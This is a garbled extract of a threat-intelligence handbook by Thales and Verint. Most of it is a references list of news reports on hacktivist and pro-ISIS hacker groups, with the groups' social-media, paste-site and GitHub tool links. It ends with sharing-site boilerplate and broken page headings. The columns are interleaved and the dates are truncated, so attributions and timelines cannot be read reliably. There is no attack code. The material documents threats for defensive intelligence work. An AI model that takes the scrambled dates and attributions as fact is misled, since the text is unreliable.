Cyber Jihad; Under #OpFrance, 20,000 French Websites
https://www.youtube.com/channel/UC-R3BjsiBbRi44uPQsD64tw Attacked, Including Gov ’t, Military; Hackers, Supporters
Celebrate On Twitter: Mocking Pope, Statue Of Liberty, ‘Coming
http://www.zone-h.org/archive/notifier=Pinoy%20Lulzsec%20
To Crush The Cross’ And ‘Your Freedom,’ Tweeting Images
-%20GrandFather
From ISIS Beheadings, http://cjlab.memri.org/lab-projects/
https://zone-h.com/archive/notifier=X-m3n?hz=1 monitoring-jihadi-and-hacktivist-activity/online-cyber-jihad-
declared-by-pro-isis-and-other-muslim-hackers-20000-french-
http://www.zone-h.org/archive/notifier=kangk0ng
websites-attacked-as-part-of-opfrance-including-government-
2/04/2018, Blogger Engineer, Pinoy LulzSec hacks multiple
0 military-websites-hackers-and-supporters-celebrate-on-twit/
PH websites for April Lulz 2018, http://bloggerengineer.com/
5/02/2015, MEMRI, Fallaga Team – Tunisian Hacker Group
0
pinoy-lulzsec-hacks-multiple-ph-websites-for-april-lulz-2018/
Engages In Jihadi Hacktivism, Active On Twitter, Facebook,
3/04/2018, Manila Bulletin, Filipino Black Hat Hackers Attack
0 YouTube, http://cjlab.memri.org/lab-projects/monitoring-jihadi-
Dozens of Websites, https://technology.mb.com.ph/2018/04/03/ and-hacktivist-activity/fallaga-team-tunisian-hacker-group-
filipino-black-hat-hackers-attack-dozens-of-websites/ engages-in-jihadi-hacktivism-active-on-twitter-facebook-youtube/
2/04/2018, Blogger Engineer, Pinoy Lulzsec hacks 2 LGUs,
2 4/02/2015, MEMRI, 6 Members Of Fallaga Team Hacker
2
1 state university websites, http://bloggerengineer.com/pinoy- Group Arrested By Tunisian Authorities Over #OpFrance, http://
lulzsec-hacks-2-lgus-1-state-university-websites/ cjlab.memri.org/lab-projects/monitoring-jihadi-and-hacktivist-
activity/6-members-of-fallaga-team-hacker-group-arrested-by-
4/05/2018, Blogger Engineer, Pinoy LulzSec defaces DepEd
1
tunisian-authorities-over-opfrance/
Angeles City website on Election Day, http://bloggerengineer.com/
pinoy-lulzsec-defaces-deped-angeles-city-website-on-election-day/ 5/03/2015, Softpedia, Cyber Caliphate Hackers Deface
2
600 Russian Internet Resources, https://news.softpedia.com/
9/05/2018, Blogger Engineer, Pinoy LulzSec defaces Phil-Nippon
2
news/Cyber-Caliphate-Hackers-Deface-600-Russian-Internet-
Technical College’s website, http://bloggerengineer.com/pinoy-
Resources-476718.shtml
lulzsec-defaces-phil-nippon-technical-colleges-website/
2/04/2015, SenseCy, LOIC Fallaga, https://blog.sensecy.com/
0
6/06/2018, Blogger Engineer, X-m3n hacks Cherry Mobile,
2
tag/loic-fallaga/
http://bloggerengineer.com/x-m3n-hacks-cherry-mobile/
3/04/2015, DW, Hackers Target Belgian Press Group, Days
1
3/07/2018, Blogger Engineer, Pinoy LulzSec hacks Steve Dailisan’s
0
After French Cyber Attack, https://www.dw.com/en/hackers-target-
Facebook, Instagram accounts, http://bloggerengineer.com/
belgian-press-group-days-after-french-cyber-attack/a-18377452-0
pinoy-lulzsec-hacks-steve-dailisans-facebook-instagram-accounts/
5/07/2015, Irish Mirror, Fallaga Team: Islamist Group Hacks
1
0/07/2018, Blogger Engineer, PH NGO certification body
2
Websites of Dublin Gyms to Display Sick Images, https://www.
gets hacked, http://bloggerengineer.com/ph-ngo-certification-
irishmirror.ie/news/irish-news/fallaga-team-islamist-group-
body-gets-hacked/
hacks-6084850
0/09/2018, Blogger Engineer, X-m3n Hacks Jollibee Subdomain,
1
5/08/2015, Asian Correspondent, Islamist Hacker Group
2
http://bloggerengineer.com/x-m3n-hacks-jollibee-subdomain/
Attacks Thai Government Websites, https://asiancorrespondent.
5/10/2018, Blogger Engineer, Hackers deface CLSU, UPHSL
1 com/2015/08/islamist-hacker-group-attacks-thai-government-
websites, http://bloggerengineer.com/hackers-deface-clsu- websites/
uphsl-websites/
1/09/2015, Politico, Hackers Attack Hungarian TV Station,
1
1/04/2019, Manila Bulletin, Pinoy LulzSec Stages April Lulz
0 https://www.politico.eu/article/hackers-attack-hungarian-tv-
Hacking Event, https://technology.mb.com.ph/2018/04/03/ station-petra-laszlo-fallaga-team/
pinoy-lulzsec-stages-april-lulz-hacking-event/
221
References _
7/01/2017, SBS News, Islamist Hackers Target Australian

1 15/April/2016, ABC Australia, Pro-Islamic State cyber group
Websites, https://www.sbs.com.au/news/islamist-hackers-target- hack websites of Australian small businesses, https://www.abc.
australian-websites net.au/news/2016-04-15/pro-islamic-state-cyber-group-hack-
websites-of-small-businesses/7329858
7/02/2017, Independent, Isis-linked Hackers Attack NHS
0
Websites to Show Gruesome Syrian Civil War Images, https:// 04/April/2017, Newsweek, ISIS-LINKED CYBER GROUP RELEASES
www.independent.co.uk/news/uk/crime/isis-islamist-hackers- ‘KILL LIST’ OF 8,786 US TARGETS FOR LONE WOLF ATTACKS,
nhs-websites-cyber-attack-syrian-civil-war-images-islamic- https://www.newsweek.com/isis-linked-cyber-group-releases-kill-
state-a7567236.html list-8786-us-targets-lone-wolf-attacks-578765
06/July/2017, Dark Reading, Hacking the State of the ISIS Cyber
ATK131 Caliphate, https://www.darkreading.com/perimeter/hacking-the-
https://twitter.com/RussianSec_171 state-of-the-isis-cyber-caliphate-/d/d-id/1329293
4/08/2019, YouTube, Cmd feito com ferramentas HACKING!!!
1 12/March/2018, HELLENIC INSTITUTE OF STRATEGIC STUDIES,
#RussianSecTeam… (SEGUINTE LEIA A DESC), https://www. From Terrorism to Cyber-terrorism: The Case of ISIS, https://papers.
youtube.com/watch?v=LG08rvuxcqQ ssrn.com/sol3/papers.cfm?abstract_id=3135927
ATK132 09/July/2018, The Jerusalem Post, EXCLUSIVE: ISLAMIC CYBER
TERRORISTS TRYING TO TARGET INFRASTRUCTURE, https://
4/07/2013, Malwarebytes Lab, Syrian Electronic Army Hacks
2 www.jpost.com/Arab-Israeli-Conflict/Exclusive-Islamic-cyber-
Tango and Viber Servers, https://blog.malwarebytes.com/ terrorists-trying-to-target-infrastructure-562052
cybercrime/2013/07/syrian-electronic-army-hacks-tango-and-
viber-servers/ 18/October/2018, Brica, #1233567: Cyber Caliphate Team
launch cracking software called “Multy BruteForce Facebook”.,
6/02/2014, The Hacker News, Facebook domain hacked by
0 https://brica.de/alerts/alert/public/1233567/cyber-caliphate-
Syrian Electronic Army, https://thehackernews.com/2014/02/ team-launch-cracking-software-called-multy-bruteforce-facebook/
facebook-domain-hacked-by-syrian.html
09/January/2019, Business Risk Intelligence & Cyberthreat Awareness,
2/06/2014, medium, How Reuters got compromised by the
2 #1242740: New year… new hacking group operating under
Syrian Electronic Army, https://medium.com/@FredericJacobs/the- the umbrella of the ISIS Global Hacking Division., https://brica.
reuters-compromise-by-the-syrian-electronic-army-6bf570e1a85b de/alerts/alert/public/1242740/new-year-new-hacking-group-
9/08/2014, FireEye, Connecting the Dots: Syrian Malware
2 operating-under-the-umbrella-of-the-isis-global-hacking-division/
Team Uses BlackWorm for Attacks, https://www.fireeye.com/blog/ 16/July/2019, Site Intelligence, ACCA CLAIMS HACKING 150
threat-research/2014/08/connecting-the-dots-syrian-malware- TWITTER ACCOUNTS, https://ent.siteintelgroup.com/Dark-Web-
team-uses-blackworm-for-attacks.html and-Cyber-Security/acca-claims-hacking-150-twitter-accounts.html
7/11/2014, Reuters, Western media websites hacked by Syrian
2
Electronic Army, https://www.reuters.com/article/us-syria-crisis- ATK134
hack/western-media-websites-hacked-by-syrian-electronic-army- 9/05/2019, AdvIntel, Top-Tier Russian Hacking Collective
0
idUSKCN0JB1HM20141127 Claims Breaches of Three Major Anti-Virus Companies, https://
1/01/2015, The Telegraph, Le Monde hacked: ‘Je ne suis pas
2 www.advanced-intel.com/post/top-tier-russian-hacking-collective-
Charlie’ writes Syrian Electronic Army, https://www.telegraph. claims-breaches-of-three-major-anti-virus-companies
co.uk/news/worldnews/europe/france/11359732/Le-Monde- 1 3/05/2019, BleepingComputer, Fxmsp Chat Logs Reveal
hacked-Je-ne-suis-pas-Charlie-writes-Syrian-Electronic-Army.html the Hacked Antivirus Vendors, AVs Respond, https://www.
3/04/2015, Vice, The Syrian Electronic Army’s Most Dangerous
0 bleepingcomputer.com/news/security/fxmsp-chat-logs-reveal-
Hack, https://www.vice.com/en_us/article/nze5nk/the-syrian- the-hacked-antivirus-vendors-avs-respond/
electronic-armys-most-dangerous-hack 13/05/2019, CBR, Trend Micro Admits it Was Hacked; Symantec
3/08/2015, Krebs on security, Washington Post Site Hacked
1 Denies Claims of “Fxmsp” Breach, https://www.cbronline.com/
After Successful Phishing Campaign, https://krebsonsecurity. news/trend-micro-symantec-fxmsp
com/2013/08/washington-post-site-hacked-after-successful- 13/05/2019, BleepingComputer, New Details Emerge of Fxmsp’s
phishing-campaign/ Hacking of Antivirus Companies, https://www.bleepingcomputer.
5/12/2018, Forbes, Syrian Electronic Army Hackers Are Targeting
0 com/news/security/new-details-emerge-of-fxmsps-hacking-of-
Android Phones With Fake WhatsApp Attacks, https://www.forbes. antivirus-companies/
com/sites/thomasbrewster/2018/12/05/syrian-electronic-army- 14/05/2019, SCMagazine, Anti-virus vendors named in Fxmsp’s
hackers-are-targeting-android-phones-with-fake-whatsapp-attacks/ alleged source code breach respond, https://www.scmagazine.
com/home/security-news/anti-virus-vendors-named-in-fxmsps-
ATK133 alleged-source-code-breach-respond/
6/January/2015, NY Daily News, FBI investigates ISIS hacker
0 20/05/2019, Asahi Shimbun, Trend Micro says its computer
group Cyber Caliphate following a series of hacks on news network was compromised, http://www.asahi.com/ajw/articles/
organizations in Maryland, Albuquerque, https://www.nydailynews. AJ201905200036.html
com/news/national/isis-hacker-group-cyber-caliphate-hacks-
article-1.2067634 25/06/2019, CBR, Trend Micro Wraps Up Investigation into
Fxmsp Hack: Code Was “Artifacts Used for Debugging Purposes”,
6/January/2015, The Guardian, Malaysia Airlines website hacked
2 https://www.cbronline.com/news/fxmsp-trend-micro
by ’Lizard Squad, https://www.theguardian.com/world/2015/
jan/26/malaysia-airlines-website-hacked-by-lizard-squad
ATK 135
1/February/2015, Alann, ‫ليشيم نوددهي ةيمالسإلا ةلودلا ةنصارق‬
1 https://twitter.com/GhostSquadHack
‫اهيتنبإو امابوأ‬, https://www.alaan.cc/article/219079/
https://www.facebook.com/GhostSquadHackers/
2/September/2015, Miror, ISIS hackers intercept top secret
1
British Government emails in major security breach uncovered https://twitter.com/H4x0Rs_Ghost666/status/1000359109114281984
by GCHQ, https://www.mirror.co.uk/news/uk-news/isis-hackers- https://www.youtube.com/channel/UC8PhMJ74E53sy9pqzf79q5w
intercept-top-secret-6428423

https://www.youtube.com/watch?v=q7rwnlbH67I ATK139
https://www.youtube.com/watch?v=NpgPkrdwFkw https://twitter.com/JTSEC3313
ttps://github.com/s1egesystems/GhostSquadHackers-Javascript-
h https://twitter.com/JTSEC1333
Encrypter-Encoder https://twitter.com/JTSEC1
https://github.com/s1egesystems/GhostDelivery https://pastebin.com/u/JTSEC1333
https://github.com/s1egesystems/RedGhost
ATK140
7/01/2016, Fossbytes, Ghost Squad Hackers Hack Ethiopian
0
Websites In Response To Killing Of Protesting Students, https:// https://twitter.com/kelvinsecteamS
fossbytes.com/ghost-squad-hackers-hack-ethiopian-website-in- https://www.facebook.com/Ksecureteam/
response-to-killing-of-students-during-protest/
https://www.facebook.com/groups/1457838784279643/
1/05/2016, HackRead, Hacktivists Shut Down Donald Trump
2
Hotel Collections Website, https://www.hackread.com/donald- http://ksecureteam.com
trump-hotel-collections-website-down/ https://github.com/kelvinsecurity
3/06/2016, HackRead, Hackers Just Leaked Personal Data of
2 http://kelvinsecteam.blogspot.com
US Military Officials and it’s Legit, https://www.hackread.com/
ghost-squad-hackers-leak-us-military-data/ https://kelvinparrasecurityinformation.blogspot.com
1/07/2016, HackRead, Twitter Account of Afghan Chief

3 https://www.youtube.com/channel/UCPdzzcEi3us1TVUZqksrMrg
Executive Dr. Abdullah Hacked, https://www.hackread.com/ https://pastebin.com/u/kelvinsecteam (removed in July 2019)
twitter-account-dr-abdullah-hacked/
9/09/2015, KelvinSecurity Team Blog, Katana Una Herramienta
0
2/08/2016, The Hack Today, Ghost Squad Hackers: Hacks
0 Para Auditoria En Tecnicas Pentest 2015, http://kelvinsecteam.
Afghan Government in Protest of Ongoing Corruption and U.S. blogspot.com/2015/09/katana-una-herramienta-para-auditoria.html
Drug Ties, https://thehacktoday.com/hacks-afghan-government-
in-protest/ 5/09/2015, SITE Intelligence Group, Website For North Carolina
1
State Parks Allegedly Hacked Databases Leaked, https://ent.
2/09/2016, Softpedia, Ghost Squad Hackers Deface 12
0 siteintelgroup.com/Dark-Web-and-Cyber-Security/website-for-
Afghan Government Websites, https://news.softpedia.com/ north-carolina-state-parks-allegedly-hacked-databases-leaked.html
news/ghost-squad-hackers-deface-12-afghan-government-
websites-507900.shtml 8/11/2015, KelvinSecurity Team Blog, RACP [TUTORIAL],
2
http://kelvinsecteam.blogspot.com/2015/11/racp-tutorial.html
3/09/2016, SecurityIntelligence, Dissecting a Hacktivist’s
2
DDoS Tool: Saphyra Revealed, https://securityintelligence.com/ 018, InfoArmor, The Evolving Threat Landscape: Nation States,
2
dissecting-hacktivists-ddos-tool-saphyra-revealed/ Third-Party Attacks, and the Dark Web, https://blog.infoarmor.
com/security-professionals/threat-landscape-nation-states-third-
7/10/2018, Security Affairs, Brazil expert discovers Oracle
1 party-attacks-dark-web
flaw that allows massive DDoS attacks, https://securityaffairs.
co/wordpress/77181/hacking/oracle-flaw-ddos-attacks.html 8/10/2018, Beyond The Perimeter, Venezuelan president’s
2
personally identifiable information available for sale, https://
8/10/2018, The Sun, YouTube HACKED? Cyber-attack group
1 medium.com/beyond-the-perimeter/venezuelan-presidents-
‘Ghost Squad’ claims responsibility for today’s outage, https:// personally-identifiable-information-available-for-sale-e315ed9575e0
www.thesun.co.uk/tech/7514214/youtube-hack-ghost-squad-
cyberattack-outage-down/ 6/02/2019, Rogue Media Labs, Air Dominica & Costa Rican Travel
1
Agency TourPlan.com Hacked by KelvinSec Team, Vulnerabilities
4/01/2019, Packt, GitHub was down first working day of 2019,
0 & Partial Databases Leaked Online, https://roguemedialabs.
hacker claims DDoS, https://hub.packtpub.com/github-was- com/2019/02/16/air-dominica-costa-rican-travel-agency-
down-first-working-day-of-2019-hacker-claims-ddos/ tourplan-com-hacked-by-kelvinsec-team-vulnerabilities-partial-
5/01/2019, What is DDoS, Was GitHub DDoSed On The First
0 databases-leaked-online/
Working Day of 2019?, https://whatisddos.com/was-github-
ddosed-on-the-first-working-day-of-2019/ ATK141
https://twitter.com/LorianSynaro
9/02/2019, Geekboots, Github down due to DDos attack,
1
https://www.geekboots.com/news/github-down-due-to-ddos-attack 3/12/2018, Rogue Media Labs, Anonymous Launches #OpIcarus
1
2.0, https://roguemedialabs.com/2018/12/13/anonymous-
ATK136 launches-opicarus-2-0/
https://twitter.com/Sprek3rsSec 6/12/2018, Rogue Media Labs, Government of Sudan Shuts
2
https://www.defcon-lab.org/o-retorno-de-sprek3rssec/ Down National Internet Access, So Anonymous Shuts Dowmn
The Government, https://roguemedialabs.com/2018/12/26/
government-of-sudan-shuts-down-national-internet-access-so-
ATK137 anonymous-shuts-down-the-government/
https://twitter.com/NewSecGroup
9/01/2019, Rogue Media Labs, Anonymous Launches String of
1
https://twitter.com/kamilulz/status/1091995698847993856 Coordinated Attacks In Solidarity with The People of Zimbabwe,
https://twitter.com/hashtag/DARKNESSGHOST https://roguemedialabs.com/2019/01/19/anonymous-launches-
string-of-coordinated-attacks-in-solidarity-with-the-people-of-
ATK138 zimbabwe/
https://twitter.com/moonzlinuxer 1/01/2019, iAfrikan, Lorian Synaro of Anonymous explains the
2
motive behind #OpSudan and #OpZimbabwe, https://www.
https://www.instagram.com/habilmoonz/
iafrikan.com/2019/01/21/lorian-synaro-of-anonymous-explains-
https://www.facebook.com/habilmoonz the-motive-behind-opsudan-and-opzimbabwe/
http://www.zone-h.org/archive/filter=1/notifier=MrMoonz
223
References _
2/03/2019, Rogue Media Labs, #OpSudan: Sudan Airways

0 0 6/03/2019, DefCon Lab, Hacktivismo - OpVenezuela
Pwned by Black Water Security, Sites Entire Email Archive Dumped - Continuacao (6), https://www.defcon-lab.org/hacktivismo-
Online, https://roguemedialabs.com/2019/03/02/opsudan- opvenezuela-continuacao-6/
sudan-airways-pnwed-by-black-water-security-sites-entire-email-
09/03/2019, Rouge Media Labs, Argentinian Subsecretaria de
archive-dumped-online/
Turismo de Santiago del Estero Gobierno de Laprida & Comuna de
7/03/2019, Rogue Media Labs, Sudan National Ploice, Blue Nile
0 Canada Rosquin Hacked by Al1ne3737, https://roguemedialabs.
Television & 19 Government Ministry Websites Crashed, Hacked, com/2019/03/09/argentinian-subsecretaria-de-turismo-de-
Defaced and/or Erased Offline Over The Last 24 Hours, https:// santiago-del-estero-gobierno-de-laprida-comuna-de-canada-
roguemedialabs.com/2019/03/07/sudan-national-police-blue- rosquin-hacked-by-al1ne3737/
nile-television-station-19-government-ministry-websites-crashed-
10/03/2019, DefCon Lab, Hacktivismo - OpAlgeria, https://
hacked-defaced-and-or-erased-offline-over-the-last-24-hours/
www.defcon-lab.org/hacktivismo-opalgeria/
6/03/2019, Rogue Media Labs, #OpSudan: International
2
1 1/03/2019, Rouge Media Labs, Cyber Attacks Against
Hackers Continue Onslaught Against al-Bashir & Government
Government of Argentina Continue On Into The Weekend,
of Sudan, https://roguemedialabs.com/2019/03/26/opsudan-
https://roguemedialabs.com/2019/03/11/cyber-attacks-against-
international-hackers-continue-onslaught-against-al-bashir-
government-of-argentina-continue-on-into-the-weekend/
government-of-sudan/
11/03/2019, Rouge Media Labs, Anonymous CyberGuerilla &
6/04/2019, Rogue Media Labs, #OpSudan: Hacktivists
0
AnonOps IRC Launch #OpCopyWrong In Attempt To Lobby EU
Around The World Prepare for Massive Cyber Attacks Against The
Parliament To Vote Against Impending Copyright Reform, https://
Government of Sudan, https://roguemedialabs.com/2019/04/06/
roguemedialabs.com/2019/03/11/anonymous-cyberguerrilla-
opsudan-hacktivists-around-the-world-prepare-for-massive-cyber-
anonops-irc-launch-opcopywrong-in-attempt-to-lobby-eu-
attacks-against-the-government-of-sudan/
parliament-to-vote-against-impending-copyright-reform/
7/04/2019, Rogue Media Labs, #OpIsrael 2019: Anonymous
0
16/03/2019, DefCon Lab, Al1ne3737: vazamento nosso de
Hackers Launch Annual Assault Against The Government of Israel
cada dia, https://www.defcon-lab.org/al1ne3737-vazamento-
for Their Continued Oppression of The Palestinian People, https://
nosso-de-cada-dia/
roguemedialabs.com/2019/04/07/opisrael-2019-anonymous-
hackers-launch-annual-assault-against-the-government-of-israel- 20/03/2019, Rouge Media Labs, 8 Government Agencies Across
for-their-continued-oppression-of-the-palestinian-people/ Colombia Hacked; Thousands of Contractors Users Administrators
Employees & Personnel Exposed in Data Breaches, https://
ATK142 roguemedialabs.com/2019/03/20/8-government-agencies-across-
https://twitter.com/pryzraky colombia-hacked-thousands-of-contractors-users-administrators-
employees-personnel-exposed-in-data-breaches/
https://twitter.com/Pryzraky/status/1079831628107706369
23/03/2019, Rouge Media Labs, Pryzraky Group Members Hack 19
https://twitter.com/xslncd Websites Across 6 Countries In Less Than 48 Hours Time, https://
https://twitter.com/Mecz1nho roguemedialabs.com/2019/03/23/pryzraky-group-members-
hack-19-websites-across-6-countries-in-less-than-48-hours-time/
https://twitter.com/ZHacker13
24/03/2019, DefCon Lab, WeekLeaks (11) 2019, https://www.
https://twitter.com/1nocent defcon-lab.org/weekleaks-11-2019/
https://www.facebook.com/PryzrakyTeam 26/03/2019, Rouge Media Labs, #OpSudan: International
archive.fo/6VYDZ Hackers Continue Onslaught Against al-Bashir & Government
of Sudan, https://roguemedialabs.com/2019/03/26/opsudan-
5/12/2018, Rouge Media Labs, Central Bank of The Bahamas
1 international-hackers-continue-onslaught-against-al-bashir-
Crashed for +28 Hours by SHIZEN, https://roguemedialabs. government-of-sudan/
com/2018/12/15/central-bank-of-the-bahamas-crashed-for-
28-hours-by-shizen/ 01/04/2019, Rouge Media Labs, Conselho Nacional de Justica
Wholly Pwned by Al1ne3737 - 94 Site Databases 53270 Individuals
4/01/2019, Rouge Media Labs, US Cert - DHS Releases
2 Compromised by The Data Breach, https://roguemedialabs.
Emergency Directive In Response To Widespread “Infrastructure com/2019/04/01/conselho-nacional-de-justica-wholly-pwned-by-
Tampering Campaign” Targetting US Executive Branch, https:// al1ne3737-94-site-databases-53270-individuals-compromised-
roguemedialabs.com/2019/01/24/us-cert-dhs-releases- by-the-data-breach/
emergency-directive-in-response-to-widespread-infrastructure-
tampering-campaign-targetting-us-executive-branch/ 03/04/2019, Rouge Media Labs, Rogue Security Labs Crashed by
PopTart of Pryzraky, https://roguemedialabs.com/2019/04/03/
7/02/2019, Rouge Media Labs, Constituents of Brasilian
0 rogue-security-labs-crashed-by-poptart-of-pryzraky/
Congressmen Jesuino Boabaid Hacked; Personal Data of Over 400
Voters Leaked Online, https://roguemedialabs.com/2019/02/07/ 1 0/04/2019, Rouge Media Labs, NASA’s Chandra X-Ray
constituents-of-brasilian-congressmen-jesuino-boabaid-hacked- Observatory UAE’s Sharaj Exports Development Center & Mackenzie
personal-data-of-over-400-voters-leaked-online/ Presbyterian Institute of Brasil Hacked by Al1ne3737 of Pryzraky,
https://roguemedialabs.com/2019/04/10/nasas-chandra-x-ray-
3/03/2019, Rouge Media Labs, #OpVenezuela: International Hackers
0 observatory-uaes-sharaj-exports-development-center-mackenzie-
Team Up As The Onslaught Against Maduro’s Government Continues presbyterian-institute-of-brasil-hacked-by-al1ne3737-of-pryzraky/
Into The Weekend, https://roguemedialabs.com/2019/03/03/
opvenezuela-international-hackers-team-up-as-the-onslaught- 18/04/2019, Rouge Media Labs, Pryzraky Hackers Responsible
against-maduros-government-continues-into-the-weekend/ for 39 International Hacks Leaks & DDoS Attacks Over The Last
4 Days, https://roguemedialabs.com/2019/04/18/pryzraky-
4/03/2019, Rouge Media Labs, Mecz1nho Markov Takes
0 hackers-responsible-for-39-international-hacks-leaks-ddos-
Down US State Department 4 Other National Institutions & attacks-over-the-last-4-days/
Government Agencies Across Venezuela, https://roguemedialabs.
com/2019/03/04/mecz1nho-markov-takes-down-us-state- 14/05/2019, Poder360, Hackers invadem sites do PSB e do MDB;
department-4-other-national-institutions-government-agencies- colocaram foto de Bolsonaro e Temer, https://www.poder360.
across-venezuela/ com.br/congresso/hackers-invadem-sites-do-psb-e-do-mdb-
colocaram-foto-de-bolsonaro-e-temer/

2/05/2019, O Globo Brasil, Site do PSOL Rio e Hackeado e
2 7/09/2019, Cybersecurity, Online oltre 37.000 dati attribuiti a
0
foto de Bolsonaro e colocada no lugar do conteudo, https:// Inas Cisl, https://www.cybersecurity.it/online-oltre-37-000-dati-
oglobo.globo.com/brasil/site-do-psol-rio-hackeado-foto-de- attribuiti-a-inas-cisl/
bolsonaro-colocada-no-lugar-do-conteudo-23685874
9/06/2019, TecMundo, Partido Socialista Brasileiro e hackeado
1
por grupo que atacou PSOL, https://www.tecmundo.com.br/
seguranca/142825-partido-socialista-brasileiro-hackeado-
grupo-atacou-psol.htm
ATK143
https://twitter.com/LulzSec_ITA
https://www.facebook.com/lulzsecitalia
http://lulzsec-news.blogspot.com
ttacks time line: https://www.edoardolimone.com/calendario-
A
attacchi/
7/07/2011, Roma Today, Attacco hacker: Frati tranquillizza
0
studenti e professori, https://nomentano.romatoday.it/san-lorenzo/
attacco-hacker-rettore-frati-la-sapienza.html
2/02/2018, ADNkronos, Anonymous attacca Salvini:
2
online 70mila mail, https://www.adnkronos.com/fatti/
politica/2018/02/22/anonymous-attacca-salvini-online-mila-
mail_vTaL8s86sduCGDCAaJQWTK.html
9/03/2018, AGI, Precisazione della precisazione. Il doppio
0
salto mortale del Miur sull’attacco hacker, https://www.agi.it/
blog-italia/cybersecurity/attacco_hacker_miur_replica-3608917/
post/2018-03-09/
5/03/2018, Edoardo Limone, Intervista a LulzSecITA su
1
OpPaperStormITA di Anonymous, https://www.edoardolimone.
com/blog/2018/03/15/intervista-a-lulzsec-su-oppaperstorm-
di-anonymous/
5/03/2018, Startup Italia, Anonymous torna alle origini e invita
1
all’azione contro corruzione e povertà, https://cybersecurity.
startupitalia.eu/60736-20180315-anonymous-contro-corruzione-
poverta
6/09/2018, La Repubblica, Anonymous torna a colpire: dopo
1
i sindacati hackerati ora i dati di militari in congedo, https://
www.repubblica.it/tecnologia/sicurezza/2018/09/16/news/
anonymous_italia_torna_a_colpire_dopo_scuola_e_sindacato_
hackerati_i_dati_dei_militari_in_congedo-206626543/
5/11/2018, Edoardo Limone, Fine della settimana nera:
0
tiriamo un bilancio degli attacchi, https://www.edoardolimone.
com/blog/2018/11/05/fine-della-settimana-nera-tiriamo-un-
bilancio-degli-attacchi/
5/11/2018, La Repubblica, Nuovo attacco di Anonymous
0
Italia: diffusi i dati di ministeri e polizia, https://www.repubblica.
it/tecnologia/sicurezza/2018/11/05/news/nuovo_attacco_di_
anonymous_italia_diffusi_i_dati_di_ministeri_e_polizia-210845817/
1/12/2018, Edoardo Limone, Cyber Attacchi in Italia: un
1
calendario e tante riflessioni, https://www.edoardolimone.
com/blog/2018/12/11/cyber-attacchi-in-italia-un-calendario-
e-tante-riflessioni/
3/01/2019, La Repubblica, Morti sul lavoro, la protesta di
1
Anonymous: hackerati i siti delle agenzie per il lavoro, https://
www.repubblica.it/cronaca/2019/01/13/news/morti_sul_lavoro_
la_protesta_di_anonymous_hackerati_i_siti_delle_agenzie_per_
il_lavoro-216468315/
8/03/2019, AGI, Gli hacker hanno ‘bucato’ la Motorizzazione
0
di Roma, https://www.repubblica.it/cronaca/2019/01/13/news/
morti_sul_lavoro_la_protesta_di_anonymous_hackerati_i_siti_
delle_agenzie_per_il_lavoro-216468315/
2/06/2019, AGI, Il collettivo hacker LulzSec colpisce ancora,
2
https://www.agi.it/cronaca/hacker_lulzsec_attacco-5705454/
news/2019-06-22/
225
Notes _

227
Notes _

229
Notes _

VERINT Systems Ltd
Maskit 33, Herzelya
https://cis.verint.com
Tour Carpe Diem
31 place des Corolles
> thalesgroup.com <

92098 Paris La Défense
- www.tpcommunication.com - © Thales - 10-2019 - This leaflet cannot be considered as a contractual specification - Photos credits: © Thales

Thales Whoswho CyberAttack Pap PDF

Transféré par

Informations du document

Titre original

Copyright

Formats disponibles

Partager ce document

Partager ou intégrer le document

Options de partage

Avez-vous trouvé ce document utile ?

Ce contenu est-il inapproprié ?

Droits d'auteur :

Formats disponibles

Thales Whoswho CyberAttack Pap PDF

Transféré par

Droits d'auteur :

Formats disponibles

The Cyberthreat Handbook

4 The Cyberthreat Handbook • Thales - Verint

The collaboration between Thales and Verint on

Pierre JEANNE Shai ARBEL

6 The Cyberthreat Handbook • Thales - Verint

T he MITRE ATT&CK matrix defines

Example of profiling an attacker group

8 The Cyberthreat Handbook • Thales - Verint

ATT&CK MITRE Matrix*

10 The Cyberthreat Handbook • Thales - Verint

12 The Cyberthreat Handbook • Thales - Verint

14 The Cyberthreat Handbook • Thales - Verint

countries CosmicDuke malware. The CosmicDuke

2013 - Campaign against trade of the Seaduke malware for this.

new malware. This campaign appears to

MODUS OPERANDI (ATT&CK FRAMEWORK)

16 The Cyberthreat Handbook • Thales - Verint

Initial Access T1070 - Indicator Removal on Host Collection

TOOLS, MALWARES AND VULNERABILITIES

2008 2009 2010 2011 2012 2013 2014

Jan-2008 Jan-2011 Oct-2011 Jan-2013 Jul-2013 Jan-2014

18 The Cyberthreat Handbook • Thales - Verint

2015 2016 2017 2018 2019 2020

4 Aug-2014 Feb-2015 Aug-2015 Apr-2016 Jul-2017 Feb-2018 Jul-2019

MODUS OPERANDI (ATT&CK FRAMEWORK)

20 The Cyberthreat Handbook • Thales - Verint

Initial Access Defense Evasion Lateral Movement

TOOLS, MALWARES AND VULNERABILITIES

22 The Cyberthreat Handbook • Thales - Verint

Massive campaign in the Indochinese

MODUS OPERANDI (ATT&CK FRAMEWORK)

24 The Cyberthreat Handbook • Thales - Verint

Initial Access Defense Evasion Lateral Movement

TOOLS, MALWARES AND VULNERABILITIES

26 The Cyberthreat Handbook • Thales - Verint

containing malicious attachments deliver ISMAgent to an organization

organizations in other country like Qatar an insurance agency based in the

leveraged credential harvesting and Aug-2017

numerous Israeli organizations attacks including one against a technology 2018

targeting multiple Israeli organization was government agency. insurance agency

Tech companies, medical organizations Summer 2018

MODUS OPERANDI (ATT&CK FRAMEWORK)

28 The Cyberthreat Handbook • Thales - Verint

Initial Access Defense Evasion Lateral Movement

30 The Cyberthreat Handbook • Thales - Verint

CAMPAIGNS TOOLS, MALWARES

It will re-emerge in December 2015 with a

spam email campaigns and watering hole 2017

MODUS OPERANDI (ATT&CK FRAMEWORK)

32 The Cyberthreat Handbook • Thales - Verint

Initial Access Privilege Escalation Lateral Movement

Assumed origin of the attacker

TOOLS, MALWARES AND VULNERABILITIES

34 The Cyberthreat Handbook • Thales - Verint

June 2017 - NotPetya outbreak Jan-2011

Assumed origin of the attacker

MODUS OPERANDI (ATT&CK FRAMEWORK)

36 The Cyberthreat Handbook • Thales - Verint

Initial Access Credential Access Command and Control

operation is baptized Dust Storm. international apparel company, a U.S. law

its operations technology, electronics, biomedical, and

2018, APT10 launched new campaigns

TOOLS, MALWARES AND VULNERABILITIES